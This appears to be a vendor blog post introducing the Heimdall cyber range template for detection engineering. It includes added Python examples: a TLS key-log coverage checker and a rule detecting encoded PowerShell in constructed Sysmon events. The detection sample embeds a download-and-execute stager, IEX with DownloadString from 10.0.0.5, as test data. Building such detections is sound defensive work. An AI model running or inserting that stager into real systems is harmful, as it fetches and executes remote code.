Cybersecurity threats have become increasingly sophisticated, and detecting and responding to them requires constant innovation and training. To meet this need we released a new template, Heimdall, for use on our Tailored Cyber Ranges. The template is designed to help organizations perform detection engineering, IOC collection, and analysis. Let's dive into the features and benefits of this range template.

Features of the Heimdall Cyber Range Template

The Heimdall template is a lightweight, feature-packed custom cyber range template, designed for cybersecurity professionals who need to conduct critical cyber research. Key features include:
- Small Domain: A small Windows domain, a domain controller plus two joined hosts, lets you focus on the individual components under test. Keeping the range small reduces the noise in logs and network traffic, so analysts can concentrate on the data relevant to their research, while the layout stays flexible enough to mimic enterprise configurations.
- Expandable and Configurable: From the ranges dashboard you can access every host and deploy additional instances into the range to match specific requirements.
- SIEM: Elasticsearch (search and analytics) and Kibana (data visualization) are deployed into the range, with logs collected from the domain controller and the connected hosts, including core Windows event logs, Sysmon, osquery, and Packetbeat network data.
- Fleet: Alongside the Elastic stack, a small Fleet server is provided for central management of the log collectors, so additional collectors can be rolled out across the range quickly and easily.
- Velociraptor: For EDR-like capabilities, including endpoint visibility, YARA scanning, threat hunting, and forensic analysis, Velociraptor is installed and configured on all Windows hosts.
- Full Packet Capture with TLS Secrets: All traffic on the Ethernet interface of each Windows host is captured and stored in a central PCAP file. Alongside the PCAPs, TLS session secrets are collected, so TLS and HTTPS traffic can be decrypted on the fly (for example in Wireshark). Only sessions whose secrets were actually logged can be decrypted, so it is worth checking key-log coverage before treating a capture as fully readable.
- Analyst Machines: A set of three analyst machines is provided: a Kali host for attack emulation, and Windows and Linux hosts with standard analysis tooling for malware and forensic analysis.
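The caveat on TLS decryption above is easy to check. The script below is an added example (illustration code, not part of the Heimdall template or any Immersive Labs tooling): it parses a key log in the NSS format that browsers and OpenSSL-based clients write when SSLKEYLOGFILE is set, and which Wireshark and tshark read through tls.keylog_file, and reports which of the ClientHello randoms seen in a capture can actually be decrypted. The key-log lines and the list of client randoms are constructed inline; in a real range you would extract the randoms from the PCAP with tshark (the field name `tls.handshake.random` used in the comment is the one assumed here).

```python
"""Key-log coverage check for a full-packet capture (added example, constructed data)."""
import re
from collections import defaultdict

# NSS key log format: "<LABEL> <client_random (64 hex)> <secret (hex)>"; '#' lines are comments.
KEYLOG_LINE = re.compile(
    r"^(?P<label>[A-Z0-9_]+)\s+(?P<client_random>[0-9a-fA-F]{64})\s+(?P<secret>[0-9a-fA-F]+)\s*$"
)

# TLS 1.2 needs only the master secret; TLS 1.3 needs both application
# traffic secrets before both directions of application data are readable.
TLS12_LABEL = "CLIENT_RANDOM"
TLS13_APP_LABELS = {"CLIENT_TRAFFIC_SECRET_0", "SERVER_TRAFFIC_SECRET_0"}


def parse_keylog(text):
    """Return {client_random: set(labels)}; malformed lines are skipped, not fatal."""
    secrets = defaultdict(set)
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = KEYLOG_LINE.match(line)
        if m:
            secrets[m["client_random"].lower()].add(m["label"])
    return secrets


def session_decryptable(labels):
    """True if the logged labels are enough to decrypt both directions of app data."""
    return TLS12_LABEL in labels or TLS13_APP_LABELS <= labels


def keylog_coverage(keylog_text, client_randoms):
    """Classify each ClientHello random seen in the pcap as full, partial or missing."""
    secrets = parse_keylog(keylog_text)
    result = {"full": [], "partial": [], "missing": []}
    for cr in client_randoms:
        labels = secrets.get(cr.lower(), set())
        if not labels:
            result["missing"].append(cr)
        elif session_decryptable(labels):
            result["full"].append(cr)
        else:
            result["partial"].append(cr)
    return result


# Constructed sample: four sessions in the pcap, a key log covering three of them.
CR_TLS12, CR_TLS13, CR_HALF, CR_NONE = ("aa" * 32, "bb" * 32, "cc" * 32, "dd" * 32)
SAMPLE_KEYLOG = "\n".join([
    "# SSL/TLS secrets log file, generated by a constructed client",
    "CLIENT_RANDOM " + CR_TLS12 + " " + "11" * 48,
    "CLIENT_HANDSHAKE_TRAFFIC_SECRET " + CR_TLS13 + " " + "22" * 32,
    "SERVER_HANDSHAKE_TRAFFIC_SECRET " + CR_TLS13 + " " + "33" * 32,
    "CLIENT_TRAFFIC_SECRET_0 " + CR_TLS13 + " " + "44" * 32,
    "SERVER_TRAFFIC_SECRET_0 " + CR_TLS13 + " " + "55" * 32,
    "EXPORTER_SECRET " + CR_TLS13 + " " + "66" * 32,
    "CLIENT_TRAFFIC_SECRET_0 " + CR_HALF + " " + "77" * 32,   # only one direction logged
    "this line is garbage and must be ignored",
])
# In practice: tshark -r capture.pcap -Y "tls.handshake.type == 1" -T fields -e tls.handshake.random
SAMPLE_CLIENT_RANDOMS = [CR_TLS12, CR_TLS13, CR_HALF, CR_NONE]

if __name__ == "__main__":
    for kind, randoms in keylog_coverage(SAMPLE_KEYLOG, SAMPLE_CLIENT_RANDOMS).items():
        print(f"{kind}: {len(randoms)} session(s)")
    # Decrypt what is covered with: tshark -r capture.pcap -o tls.keylog_file:keys.log -Y http
```

A "partial" session usually means the key log was written by a client that only had one side's secret available (or was truncated mid-handshake); a "missing" session is traffic from a process that does not honour the key-log hook at all, which is the common case for non-browser Windows binaries.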
Benefits of the Heimdall Cyber Range Template

The Heimdall cyber range template offers several benefits to users:
- Isolated Environments: The template is purpose-built to let organizations safely work with the latest attacker toolsets and TTPs without impacting corporate networks and infrastructure.
- Detection Engineering: Analyzing malware or TTPs to produce SIEM or network rules often requires specialist setup and configuration. With Heimdall that configuration is ready on demand, so your teams can focus on the analysis and rule creation rather than on managing and maintaining infrastructure.
- Rapid Response to Emerging Threats: Having an environment ready to review new malware and TTPs means network defenders can more quickly test and validate publicly shared IOCs before deploying them to production environments, helping reduce risk and improve overall security posture.
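As an added example of the rule-authoring loop the range is built for (illustration code, not part of Heimdall, Elastic or Velociraptor), the script below runs one detection over constructed Sysmon Event ID 1 records shaped like the ECS documents the Elastic stack would index: it flags PowerShell launched with an encoded command, decodes the base64 UTF-16LE payload, and pulls any URLs out of it as candidate IOCs. The event contents, host names, timestamps and the 10.0.0.5 address are all constructed; the ECS field names (event.provider, event.code, process.command_line, process.parent.name) are the standard ones.

```python
"""Detect encoded PowerShell in Sysmon process-creation events and extract IOCs.

Added example over constructed ECS-shaped records; not Heimdall or Elastic code.
"""
import base64
import re

# Sysmon Event ID 1 (process creation) as Winlogbeat / Elastic Agent index it (ECS).
SYSMON_PROVIDER = "Microsoft-Windows-Sysmon"
PROCESS_CREATE = "1"
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# "-flag <base64 blob>" pairs; the 16-char minimum keeps "-ep bypass" and "-w hidden" out.
FLAG_BLOB_RE = re.compile(r"[-/](\w+)\s+[\"']?([A-Za-z0-9+/=]{16,})")
URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?(?:/[\w./\-?=&%]*)?", re.IGNORECASE)


def is_encoded_flag(flag):
    """PowerShell accepts -e, -ec and any prefix of -EncodedCommand from -en upwards."""
    f = flag.lower()
    return f in ("e", "ec") or (f.startswith("en") and "encodedcommand".startswith(f))


def decode_encoded_command(command_line):
    """Return the decoded script, or None if no valid encoded command is present."""
    for flag, blob in FLAG_BLOB_RE.findall(command_line):
        if not is_encoded_flag(flag):
            continue
        try:
            # -EncodedCommand is base64 over UTF-16LE, not UTF-8.
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue  # looked like a blob but was not a real encoded command
    return None


def detect_encoded_powershell(events):
    """Rule: Sysmon EID 1, image is PowerShell, command line carries an encoded command."""
    findings = []
    for ev in events:
        if ev.get("event", {}).get("provider") != SYSMON_PROVIDER:
            continue  # scoped to Sysmon; Security 4688 records need their own rule
        if str(ev.get("event", {}).get("code")) != PROCESS_CREATE:
            continue
        proc = ev.get("process", {})
        if proc.get("name", "").lower() not in POWERSHELL:
            continue
        decoded = decode_encoded_command(proc.get("command_line", ""))
        if decoded is None:
            continue
        findings.append({
            "host": ev.get("host", {}).get("name"),
            "timestamp": ev.get("@timestamp"),
            "parent": proc.get("parent", {}).get("name"),
            "decoded": decoded,
            "urls": sorted(set(URL_RE.findall(decoded))),  # candidate IOCs
        })
    return findings


# Constructed sample events (not real telemetry).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/stage.ps1')"
ENCODED = base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {   # suspicious: Word spawning hidden, encoded PowerShell
        "@timestamp": "2023-04-24T10:15:02.000Z",
        "host": {"name": "ws01"},
        "event": {"provider": SYSMON_PROVIDER, "code": "1"},
        "process": {"name": "powershell.exe",
                    "command_line": "powershell.exe -nop -w hidden -enc " + ENCODED,
                    "parent": {"name": "WINWORD.EXE"}},
    },
    {   # benign: admin script run by a scheduled task
        "@timestamp": "2023-04-24T10:16:40.000Z",
        "host": {"name": "dc01"},
        "event": {"provider": SYSMON_PROVIDER, "code": "1"},
        "process": {"name": "powershell.exe",
                    "command_line": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
                    "parent": {"name": "svchost.exe"}},
    },
    {   # same launch seen via Security 4688, deliberately outside this rule's scope
        "@timestamp": "2023-04-24T10:15:02.000Z",
        "host": {"name": "ws01"},
        "event": {"provider": "Microsoft-Windows-Security-Auditing", "code": "4688"},
        "process": {"name": "powershell.exe",
                    "command_line": "powershell.exe -nop -w hidden -enc " + ENCODED},
    },
]

if __name__ == "__main__":
    for hit in detect_encoded_powershell(SAMPLE_EVENTS):
        print(hit["host"], hit["parent"], hit["urls"])
```

Running the same logic against events the range has indexed is the point of the template: replay the sample, tune the rule until the benign launch stays quiet, then port the matching conditions to an Elastic detection rule and feed the extracted URLs to the network rules and the Velociraptor hunts.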
Now that You've been Properly Introduced

The Heimdall template is a valuable addition to any organization using Immersive Labs Cyber Ranges. With event logging, endpoint security, full packet capture, and TLS inspection, this range template lets organizations efficiently perform detection engineering against the latest attacker tools, techniques, and methods. Organizations can use the template to improve their cybersecurity posture and continuously advance their response times and techniques, reducing the risk of a cyber attack.

Immersive Labs Cyber Ranges enable organizations to build customizable environments to simulate target networks or run other advanced cyber readiness activities. Available on demand when you need them, sophisticated ranges can be created in hours instead of days, with minimal maintenance. Go here to learn more about Immersive Labs Cyber Ranges.